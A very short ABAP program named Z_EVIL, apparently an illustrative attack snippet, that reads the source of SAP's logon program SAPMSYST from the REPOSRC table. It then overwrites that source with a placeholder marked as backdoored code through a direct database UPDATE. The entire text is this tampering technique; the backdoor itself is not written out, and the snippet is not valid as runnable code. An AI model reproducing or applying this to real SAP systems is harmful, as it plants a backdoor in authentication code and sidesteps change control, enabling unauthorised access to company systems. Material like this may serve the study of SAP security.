REPORT Z_EVIL.
DATA it_src TYPE STANDARD TABLE OF reposrc.
DATA wa_src LIKE LINE OF it_src.
SELECT * FROM reposrc INTO TABLE it_src
WHERE progname = 'SAPMSYST'.

UPDATE REPOSRC
SET DATA = <BACKDOORED_CODE>
WHERE PROGNAME = 'SAPMSYST'.